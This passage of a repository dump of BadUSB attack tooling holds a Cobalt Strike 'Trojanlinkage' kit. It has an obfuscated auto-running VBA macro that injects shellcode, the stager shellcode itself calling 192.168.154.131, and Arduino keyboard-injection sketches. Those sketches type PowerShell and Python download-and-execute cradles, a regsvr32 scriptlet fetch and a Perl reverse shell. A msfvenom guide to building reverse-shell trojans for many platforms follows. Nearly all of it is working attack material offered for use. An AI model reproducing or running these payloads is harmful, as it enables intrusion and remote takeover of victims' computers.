_\nChr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"& _\nChr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)& _\n\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\" _\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)& _\n\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"& _\nChr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"& _\nChr(44)&\"99\"&Chr(44)&\" 
_\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)& _\n\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"0\"&Chr(44)&\"104\"&Chr(44)&Chr(45)&\"16\"&Chr(44)& _\nChr(45)&\"75\"&Chr(44)&Chr(45)&\"94\"&Chr(44)&\"86\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&\"106\"&Chr(44)&\"64\"&Chr(44)&\"104\"&Chr(44)&\"0\"&Chr(44)&\"16\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\" _\"&Chr(10)&\"104\"& _\nChr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"64\"&Chr(44)&\"0\"&Chr(44)&\"87\"&Chr(44)&\"104\"&Chr(44)&\"88\"&Chr(44)&Chr(45)&\"92\"&Chr(44)&\"83\"&Chr(44)&Chr(45)&\"27\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)& _\n\"109\"&Chr(44)&Chr(45)&\"71\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"39\"&Chr(44)&\"81\"&Chr(44)&\"83\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"25\"&Chr(44)&\"87\"&Chr(44)&\"104\"& _\nChr(44)&\"0\"&Chr(44)&\"32\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"83\"&Chr(44)&\"86\"&Chr(44)&\"104\"&Chr(44)&\"18\"&Chr(44)&Chr(45)&\"106\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"30\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)& _\n\"43\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"123\"&Chr(44)&Chr(45)&\"64\"&Chr(44)&\"116\"&Chr(44)&Chr(45)&\"58\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"7\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"61\"&Chr(44)&Chr(45)&\"123\"&Chr(44)&Chr(45)& _\n\"64\"&Chr(44)&\"117\"&Chr(44)&Chr(45)&\"27\"&Chr(44)&\"88\"&Chr(44)&Chr(45)&\"61\"&Chr(44)&Chr(45)&\"24\"&Chr(44)&Chr(45)&\"87\"&Chr(44)&Chr(45)&\"3\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"49\"&Chr(44)&\"57\"& 
_\nChr(44)&\"50\"&Chr(44)&\"46\"&Chr(44)&\"49\"&Chr(44)&\"54\"&Chr(44)&\"56\"&Chr(44)&\"46\"&Chr(44)&\"49\"&Chr(44)&\"53\"&Chr(44)&\"52\"&Chr(44)&\"46\"&Chr(44)&\"49\"&Chr(44)&\"51\"&Chr(44)&\"49\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)& _\n\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(41)&Chr(10)&\"    If L\"&\"en\"&Chr(40)&\"Environ\"&Chr(40)&Chr(34)&\"ProgramW\"&\"6432\"&Chr(34)&Chr(41)&Chr(41)&\" \"&Chr(62)&\" 0 Then\"&Chr(10)&\"        \"&\"sProc \"&Chr(61)&\" Environ\"& _\nChr(40)&Chr(34)&\"windir\"&Chr(34)&Chr(41)&\" \"&Chr(38)&\" \"&Chr(34)&Chr(92)&Chr(92)&\"SysWOW64\"&Chr(92)&Chr(92)&\"rundll32\"&Chr(46)&\"exe\"&Chr(34)&Chr(10)&\"    Else\"&Chr(10)&\"        \"&\"sProc \"&Chr(61)&\" Environ\"& _\nChr(40)&Chr(34)&\"windir\"&Chr(34)&Chr(41)&\" \"&Chr(38)&\" \"&Chr(34)&Chr(92)&Chr(92)&\"System32\"&Chr(92)&Chr(92)&\"rundll32\"&Chr(46)&\"exe\"&Chr(34)&Chr(10)&\"    End \"&\"If\"&Chr(10)&Chr(10)&\"    res \"&Chr(61)&\" RunStuf\"& _\n\"f\"&Chr(40)&\"sNull\"&Chr(44)&\" sProc\"&Chr(44)&\" ByVal 0\"&Chr(38)&Chr(44)&\" ByVal 0\"&Chr(38)&Chr(44)&\" ByVal 1\"&Chr(38)&Chr(44)&\" ByVal 4\"&Chr(38)&Chr(44)&\" ByVal 0\"&Chr(38)&Chr(44)&\" sNull\"&Chr(44)&\" sInfo\"& _\nChr(44)&\" pInfo\"&Chr(41)&Chr(10)&Chr(10)&\"    rwxp\"&\"age \"&Chr(61)&\" AllocSt\"&\"uff\"&Chr(40)&\"pInfo\"&Chr(46)&\"hProcess\"&Chr(44)&\" 0\"&Chr(44)&\" UBound\"&Chr(40)&\"myArray\"&Chr(41)&Chr(44)&\" \"&Chr(38)&\"H1000\"& _\nChr(44)&\" \"&Chr(38)&\"H40\"&Chr(41)&Chr(10)&\"    For \"&\"offset \"&Chr(61)&\" LBound\"&Chr(40)&\"myArray\"&Chr(41)&\" To UBou\"&\"nd\"&Chr(40)&\"myArray\"&Chr(41)&Chr(10)&\"        \"&\"myByte \"&Chr(61)&\" myArray\"&Chr(40)& _\n\"offset\"&Chr(41)&Chr(10)&\"        \"&\"res \"&Chr(61)&\" WriteSt\"&\"uff\"&Chr(40)&\"pInfo\"&Chr(46)&\"hProcess\"&Chr(44)&\" rwxpage\"&\" \"&Chr(43)&\" offset\"&Chr(44)&\" myByte\"&Chr(44)&\" 1\"&Chr(44)&\" ByVal 0\"&Chr(38)& _\nChr(41)&Chr(10)&\"    Next\"&\" offset\"&Chr(10)&\"    res \"&Chr(61)&\" 
CreateS\"&\"tuff\"&Chr(40)&\"pInfo\"&Chr(46)&\"hProcess\"&Chr(44)&\" 0\"&Chr(44)&\" 0\"&Chr(44)&\" rwxpage\"&Chr(44)&\" 0\"&Chr(44)&\" 0\"&Chr(44)&\" 0\"& _\nChr(41)&Chr(10)&\"End Sub\"&Chr(10)&\"Sub Auto\"&\"Open\"&Chr(40)&Chr(41)&Chr(10)&\"    Auto\"&\"_Open\"&Chr(10)&\"End Sub\"&Chr(10)&\"Sub Work\"&\"book_Ope\"&\"n\"&Chr(40)&Chr(41)&Chr(10)&\"    Auto\"&\"_Open\"&Chr(10)&\"End Sub\"& _\nChr(10)\nobjExcel.DisplayAlerts = False\non error resume next\nobjExcel.Run \"Auto_Open\"\nobjWorkbook.Close False\nobjExcel.Quit\n\n' Restore the registry to its old state\nif action = \"\" then\n\tWshShell.RegDelete RegPath\nelse\n\tWshShell.RegWrite RegPath, action, \"REG_DWORD\"\nend if\n\t\t]]>\n\t\t</script>\n\t</registration>\n</scriptlet>"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.txt",
    "content": "\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x70\\x44\\x42\\x66\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6
f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x35\\x34\\x2e\\x31\\x33\\x31\\x00\\x0
0\\x00\\x00\\x00"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.vba",
    "content": "myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _\n13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _\n-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _\n-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _\n-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,36,5,0,0,83,80,104,87,-119,-97, _\n-58,-1,-43,-21,112,91,49,-46,82,104,0,2,96,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _\n104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _\n-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _\n-1,-1,47,86,110,82,70,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _\n105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _\n105,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _\n83,73,69,32,49,48,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,50,59,32,87,105,110,54,52,59,32,120,54,52,59,32,84,114, _\n105,100,101,110,116,47,54,46,48,41,13,10,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, 
_\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _\n104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _\n-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,49,57,50,46,49,54,56,46,49,53,52,46,49,51,49,0,0,0,0,0)"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/PSL_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"powershell.exe -nop -w hidden -c \\\"IEX ((new-object net.webclient).downloadstring('http://192.168.154.131:80/c'))\\\"\");  //访问Web Delivery-psl，恶意网址按照实际更改\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/PY_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"python -c \\\"import urllib2; exec urllib2.urlopen('http://192.168.154.131:80/d').read();\\\"\");  //访问Web Delivery-py，恶意网址按照实际更改\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/Pl_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"IP:port\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};\");  //访问Web Delivery-Perl，恶意网址按照实际更改\n  delay(200); \n  //Keyboard.println(\"./hacked.pl\");\n  //delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/Regsvr32_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"regsvr32 /s /n /u /i:http://192.168.154.131:80/e scrobj.dll\");  //访问Web Delivery-regsvr32，恶意网址按照实际更改\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CodePrincipleInterpretation/ArduinoKeyCodeBase.ino",
    "content": "//基础按键\nKEY_LEFT_CTRL\nKEY_LEFT_SHIFT\nKEY_LEFT_ALT\nKEY_LEFT_GUI //win键\nKEY_RIGHT_CTRL\nKEY_RIGHT_SHIFT\nKEY_RIGHT_ALT\nKEY_RIGHT_GUI\nKEY_UP_ARROW\nKEY_DOWN_ARROW\nKEY_LEFT_ARROW\nKEY_RIGHT_ARROW\nKEY_BACKSPACE\nKEY_TAB\nKEY_RETURN//回车键\nKEY_ESC\nKEY_INSERT\nKEY_DELETE\nKEY_PAGE_UP\nKEY_PAGE_DOWN\nKEY_HOME\nKEY_END\nKEY_CAPS_LOCK\nKEY_F1\nKEY_F2\nKEY_F3\nKEY_F4\nKEY_F5\nKEY_F6\nKEY_F7\nKEY_F8\nKEY_F9\nKEY_F10\nKEY_F11\nKEY_F12\n\ndelay(5000);//延时毫秒\n\nKeyboard.begin(); //开始键盘通讯\nKeyboard.end(); //结束键盘通讯\nKeyboard.press(); //按下键盘按键 如果是非特殊按键如 数字、字母按键用单引号括起来\nKeyboard.release(); //释放键盘按键\nKeyboard.println(\"\"); //输入字符串使用双引号括起来\n\nMouse.begin();//鼠标事件开始\nMouse.click();//鼠标单击\nMouse.end();//鼠标事件结束\nMouse.move();//鼠标移动(x,y)\nMouse.press();//鼠标按下\nMouse.release();//鼠标松开\nMouse.isPressed();\n"
  },
  {
    "path": "CodePrincipleInterpretation/InstructionsOn_setup_loop_Methods.txt",
    "content": "ʲôsetup\n   setup BadusbڲϺ״ִеĴ\n   Badusbͨʹõľsetup\n   ֻҪд\n          void setup(){//д}\n\nʲôloop\n   loopѭڲѭ£еĴѭִУдһϰF5ѭ룬ܲϺԾͻ\n\n   ΪʲôBadusbһдsetup\nԭܼ\n   㽫дloopлᵼԼҲ޷Ĵ룬ΪһĵԾͣ\n\nôµĴ޷д룬ǿд룬ҪĻñȽϸ\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
  },
  {
    "path": "CodePrincipleInterpretation/MSF_TrojanMakingTutorial.txt",
    "content": "msf木马制作\n\n1、在攻击者终端操作：\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=kaliIP lport=<Your Port> -f exe >/root/Desktop/evilshell.exe\n-p 参数后跟上payload（攻击载荷）\nlhost  后跟监听的IP\nlport  后跟监听的端口\n-f  后跟要生成后门文件的类型\n-o  指定输出文件及类型\n-i  混淆次数\n-e  混淆模式\n例如：exe木马：\n      msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP> lport=<Your Port> -f exe -o virus.exe -e x86/shikata_ga_nai -i 8\n\t  \n      jsp木马：\n\t  msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > virus.jsp\n\t  \n\t  #Powershell木马:\n      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f psh-reflection > virus.psl\n \n      #JAVA木马:\n      msfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f jar -o virus.jar\n      \n      #PHP木马:\n      msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw -o virus.php\n      \n      #ASP木马:\n      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f asp > virus.asp\n      \n      #ASPX木马:\n      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f aspx > virus.aspx\n      \n      #Python木马:\n      msfvenom -p python/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f  raw > virus.py\n      \n      #Android木马:\n      msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -o virus.apk\n      \n      #Bash木马:\n      msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP> LPORT=<Your Port> -f raw > virus.sh\n      \n      #Linux木马：\n      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f elf > shell.elf\n      \n      #Mac木马：\n      msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f macho > shell.macho\n      \n      #WAR木马：\n      msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f war > shell.war\n      \n      #Perl木马：\n      msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP 
LPORT=<Your Port> -f raw > shell.pl\n\n\n2、开启postgresql数据库：（简单攻击可省略）\n/etc/init.d/postgresql status  查看postgresql服务的状态\n/etc/init.d/postgresql start  开启postgresql服务\nnetstat -ntulp  查看端口\n\n\n3、启动msf监听，等待BadUSB插入，对方上线：\nmsfconsole  开启MSF\nmsf5>use exploit/multi/handler 选择exploits\nmsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  设置payload，注意与上方payload相同\nshow options  查看所需设置的参数\nset lhost KaliIP (设置监听地址，注意与上方lhost相同)\nset lport <Your Port>  设置监听端口\nrun 或者exploit  运行攻击模块\n"
  },
  {
    "path": "DNSHijack/DOS_CommandSetMultipleDNS(DNSHijack).ino",
